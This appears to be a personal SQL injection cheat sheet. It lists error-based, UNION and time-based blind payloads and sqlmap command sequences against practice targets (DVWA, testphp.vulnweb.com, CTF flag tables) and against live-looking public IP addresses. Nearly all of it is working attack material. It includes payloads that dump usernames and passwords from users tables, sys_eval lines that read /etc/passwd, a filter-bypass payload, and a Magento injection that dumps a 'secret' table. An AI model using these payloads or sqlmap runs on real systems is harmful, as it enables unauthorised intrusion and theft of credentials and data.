http://185.84.161.186:8085/support?type=unresolved%27+and+%27A%27=%27A#
------
'+or+'A'='A#
'+union+select+1,2,3,4,5,6,7,8,9,10,11 where 'A'='A#
'+union+select+*+from+information_schema.tables+where+'A'='A#
; select * from information_schema.tables where 'a'='a#
; select * from information_schema.tables#
; show tables
; select 1,2 from information_schema.columns#
union+select+1,2,3,4,5,6+where+'a'=a#
' UNION SELECT 1,2,3,4,5 FROM support_tickets where 'a'='a#
' UNION SELECT 1,group_concat(table_name),3,4,5 FROM information_schema.tables where 'a'='a#
' UNION SELECT 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns where table_name+=+'support_tickets#
' UNION SELECT 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns where table_name+=+'users#
-> id,username,password,email,role,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
' UNION SELECT 1,group_concat(id,username,password,email,role,0x3a),3,4,5,6 FROM users where 'a'='a#





========================================================================================================

1.Error-based SQL injection（报错型注入
2.UNION query SQL injection（可联合查询注入
3.Boolean-based blind SQL injection（布尔型注入

========================================================================================================
*** 1.Error-based SQL injection（报错型注入）***
cat=1%27
cat=1+and+extractvalue(1,'^x')
cat=1+and+extractvalue(1,concat(':',database()))
cat=1+and+extractvalue(1,concat(':',(select+group_concat(table_name)+from+information_schema.tables)))
cat=1+and+extractvalue(1,concat(':',length((select+group_concat(table_name)+from+information_schema.tables))))
cat=1+and+extractvalue(1,concat(':',length((select+group_concat(table_name)+from+information_schema.tables+where+table_schema+=+database()))))
cat=1+and+extractvalue(1,concat(':',substr((select+group_concat(table_name)+from+information_schema.tables+where+table_schema+=+database()),1,31)))
cat=1+and+extractvalue(1,concat(':',length((select+group_concat(column_name)+from+information_schema.columns+where+table_name+=+'users'))))
cat=1+and+extractvalue(1,concat(':',substr((select+group_concat(column_name)+from+information_schema.columns+where+table_name+=+'users'),1,31)))
cat=1+and+extractvalue(1,concat(':',length((select+group_concat(cat_id,0x3a,cdesc,0x3a,cname)+from+categ))))
cat=1+and+extractvalue(1,concat(':',substr((select+group_concat(cat_id,0x3a,cdesc,0x3a,cname)+from+categ),1,31)))


+and+extractvalue(1,concat(':',length((select+group_concat(cat_id,0x3a,cdesc,0x3a,cname)+from+categ))))
+and+extractvalue(1,concat(':',length((select+group_concat(feature_text,0x3a,pic_id,0x3a)+from+featured))))
+and+extractvalue(1,concat(':',substr((select+group_concat(feature_text,0x3a,pic_id,0x3a)+from+featured),1,31)))

cat=1+and+extractvalue(1,concat(':',(select+group_concat(column_name)+from+information_schema.columns+where+table_name+=+'artists'))


*** 1.2 Error based
1' and extractvalue(1,'^x') -- #
1' and extractvalue(1,concat(':',database())) -- #                  // database = book
1' and extractvalue(1,concat(':',(select group_concat(table_name) from information_schema.tables))) -- #        // CHARACTER_SETS,COLLATIONS,COLLA
1' and extractvalue(1,concat(':',(select group_concat(table_name) from information_schema.tables where table_schema = database()))) -- #        // ':book_list,flag'
1' and extractvalue(1,concat(':',(select * from flag))) -- #
--------------------------------
test') ;-- #
test' and updatexml(1, concat(0x7e, (user())), 0)); -- # 
test' and updatexml(1, concat(0x7e, (version())), 0)); -- #
test' and updatexml(1, concat(0x7e, (database())), 0)); -- #
1' and updatexml(1, concat(0x7e, (SELECT concat(':',table_name) FROM  information_schema.tables limit 0,1)), 0)); -- #
1' and updatexml(1, concat(0x7e, (SELECT concat(':',table_name) FROM  information_schema.tables where table_schema='member' limit 0,1)), 0)); -- #
1' and updatexml(1, concat(0x7e, (SELECT concat(':',table_name) FROM information_schema.tables where table_schema='member' limit 1,1)), 0)); -- #
1' and updatexml(1, concat(0x7e, (SELECT concat(':',table_name) FROM  information_schema.tables where table_schema='member' limit 2,1)), 0)); -- #
1' and updatexml(1, concat(0x7e, (SELECT concat(':',table_name) FROM  information_schema.tables where table_schema='member' limit 3,1)), 0)); -- #
1' and updatexml(1, concat(0x7e, (SELECT concat_ws(':',column_name) FROM  information_schema.columns where table_name='flag' limit 0,1)), 0)); -- #

========================================================================================================
*** 2.UNION query SQL injection（可联合查询注入）***
http://testphp.vulnweb.com/listproducts.php?cat=1
cat=1+order+by+11
cat=-1+union+select+1,18107397,3,4,5,6,7,8,9,10,11
cat=-1+union+select+1,18107397,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables
cat=-1+union+select+1,18107397,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables+where+table_schema+=+database()
cat=-1+union+select+1,18107397,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name+=+'users'%27'
cat=-1+union+select+1,18107397,3,4,5,6,7,8,9,10,group_concat(uname,0x3a,email,0x3a,pass)+from+users

cat=1+and+(SELECT+pass+from+users+where+uname='test')='test'%27'
cat=1+and+substr((SELECT+pass+from+users+where+uname='test'),1,1)='t'

========================================================================================================
*** 3.Boolean-based blind SQL injection（布尔型注入）***
http://testphp.vulnweb.com/listproducts.php?cat=1
sleep(5)
case when true then sleep(1) else sleep(2) end
case when (select pass from users where uname='test')='t' then sleep(1) else sleep(2) end

-----------
1' and sleep(3) -- #
1' and case when true then sleep(1) else sleep(2) end -- #
1' and case when true false sleep(1) else sleep(2) end -- #
sqlmap -r req.txt -p bookID --schema --batch
sqlmap -r req.txt -p bookID 
    #########################
    # [13:07:45] [INFO] the back-end DBMS is MySQL
    # web server operating system: Linux Ubuntu
    # web application technology: Nginx 1.10.3
    # back-end DBMS: MySQL >= 5.0.12
    ########################
sqlmap -r req.txt -p bookID --dbs 
    #########################
    # [13:08:27] [INFO] fetching database names
    # available databases [5]:
    # [*] book
    # [*] information_schema
    # [*] mysql
    # [*] performance_schema
    # [*] sys
    #########################
sqlmap -r req.txt -p bookID -D book --tables 
    #########################
    #  [13:12:35] [INFO] fetching tables for database: 'book'
    #  Database: book
    #  [2 tables]
    #  +-----------+
    #  | book_list |
    #  | flag      |
    #  +-----------+
    #########################
sqlmap -r req.txt -p bookID -D book -T flag --columns
    #########################
    # [13:14:30] [INFO] fetching columns for table 'flag' in database 'book'
    # Database: book
    # Table: flag
    # [1 column]
    # +------------+--------------+
    # | Column     | Type         |
    # +------------+--------------+
    # | flag_value | varchar(100) |
    # +------------+--------------+
    #########################
sqlmap -r req.txt -p bookID -D book -T flag --dump 
========================================================================================================




main proc----> substr((SELECT%20pass%20from%20users%20where%20uname=%27test%27),1,1)=%27t%27


*** TEST ***
newsid=1+order+by+5
newsid=999+union+select+1,2,3,4,5
newsid=999+union+select+1,database(),group_concat(table_name),4,5+from+information_schema.tables
newsid=999+union+select+1,database(),group_concat(column_name),4,5+from+information_schema.columns+where+table_name='users'

case when substr((select password from users where username='admin'),1,1)='p' then sleep(1) else 123 end
1%20and%20substring(@@version,%201,%201)=8
1%20and%20case when substring(@@version,%201,%201)=8 then sleep(3) else 123 end

' OR '1'='1'#
' order by 2 #
'union select group_concat(table_name), null from information_schema.tables where table_schema = database() #
'union select group_concat(column_name), null from information_schema.columns where table_name = 'users' #
'union select user_id, password from users #

========================================================================================================
DVWA

python3 sqlmap.py \
    -u "http://localhost/vulnerabilities/sqli_blind/?id=&Submit=Submit" \
    --cookie="PHPSESSID=9fje9p9id62qvql64oti9i2vf2; security=low"

python3 sqlmap.py \
    -u "http://localhost/vulnerabilities/sqli_blind/?id=&Submit=Submit" \
    --cookie="PHPSESSID=9fje9p9id62qvql64oti9i2vf2; security=low" \
    --schema --batch 

python3 sqlmap.py \
    -u "http://localhost/vulnerabilities/sqli_blind/?id=&Submit=Submit" \
    --cookie="PHPSESSID=9fje9p9id62qvql64oti9i2vf2; security=low" \
    -D dvwa --tables

python3 sqlmap.py \
    -u "http://localhost/vulnerabilities/sqli_blind/?id=&Submit=Submit" \
    --cookie="PHPSESSID=9fje9p9id62qvql64oti9i2vf2; security=low" \
    --columns -D dvwa -T users

python3 sqlmap.py \
    -u "http://localhost/vulnerabilities/sqli_blind/?id=&Submit=Submit" \
    --cookie="PHPSESSID=9fje9p9id62qvql64oti9i2vf2; security=low" \
    --dump -D dvwa -T users
------

sqlmap \
    -u "http://localhost/vulnerabilities/sqli_blind/?id=&Submit=Submit" \
------
Four%' UNION ALL SELECT 1,2,3,4-- -
Four%' UNION ALL SELECT 1,2,database(),4-- -
Four%' UNION ALL SELECT 1,2,group_concat(table_name),4 from information_schema.tables-- -
Four%' UNION ALL SELECT 1,2,group_concat(table_name),4 from information_schema.tables-- -
======================================

sqlmap -r req.txt –threads 10 -p "bookID" --schema --batch
sqlmap -r req.txt –threads 10 -p "bookID" –technique U --schema --batch
sqlmap -r req.txt –threads 10 -p "bookID" –technique U --dbs
sqlmap -r req.txt –threads 10 -p "bookID" –technique U -D book -T
sqlmap -r req.txt –threads 10 -p "bookID" –technique U -D book --tables
sqlmap -r req.txt –threads 10 -p "bookID" –technique U -D book -T flag --columns
sqlmap -r req.txt –threads 10 -p "bookID" –technique U -D book -T flag --dump

==================
boolean blind based, sql injection(可联合查询注入)
1' and sleep(5) -- #
1' and case when true then sleep(1) else sleep(2) end -- #
1' and case when (select sys_eval('cat /var/www/index.php'))='<' then sleep(10) else sleep(2) end -- #
=====
unions based
1' and '1'='1' ;-- #
1’ and '1'='1' union select 1,2,3,4,5,6,7,8;-- #
1' and '1'='1' union select 1,2,3,4,5,6,group_concat(sys_eval('cat /etc/passwd')),8;-- #

===========
django
admin/t/collection/?detail__a%27
/admin/t/collection/?detail__a*

====================
=>sqli req.txt body parameter with blocking some
1' && '1'='1' ;-- #
1’ && '1'='1' union select 1,2,3,4,5,6,7,8;-- #
1' && '1'='0' union SELECT  1,2,3,4,5,6,group_concat(table_name),8 from sys.schema_table_statistics ;-- #
1' && '1'='0' union/* */SELECT 1,2,(select `1` from (select 1 union/* */SELECT * from flag)secplayground limit 1,1),4,5,6,7,8 ;-- #
====================

uri => /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=%3f&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1%3d1)+--+-

sqlmap -u 'http://35.240.215.19/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=%3f&ids[0][product_id][to]=' \
--threads 10 -p "ids[0][product_id][to]" --prefix=")))" \
--suffix=" -- -" --dbms=mysql --ignore-code=400 \
--level=5 --risk=3 --batch -o --current-db --random-agent

sqlmap -u 'http://35.240.215.19/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=%3f&ids[0][product_id][to]=' \
--threads 10 -p "ids[0][product_id][to]" --prefix=")))" \
--suffix=" -- -" --dbms=mysql --ignore-code=400 \
--level=5 --risk=3 --batch -o --current-db

sqlmap -u 'http://35.240.215.19/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=%3f&ids[0][product_id][to]=' \
--threads 10 -p "ids[0][product_id][to]" --prefix=")))" \
--suffix=" -- -" --dbms=mysql --ignore-code=400 \
--level=5 --risk=3  --batch --dbs'

sqlmap -u 'http://35.240.215.19/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=%3f&ids[0][product_id][to]=' \
--threads 10 -p "ids[0][product_id][to]" --prefix=")))" \
--suffix=" -- -" --dbms=mysql --ignore-code=400 \
--level=5 --risk=3 --technique -T --batch -D magento --tables

sqlmap -u 'http://35.240.215.19/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=%3f&ids[0][product_id][to]=' \
--threads 10 -p "ids[0][product_id][to]" --prefix=")))" \
--suffix=" -- -" --dbms=mysql --ignore-code=400 \
--level=5 --risk=3 --technique=T --batch -D magento -T secret --dump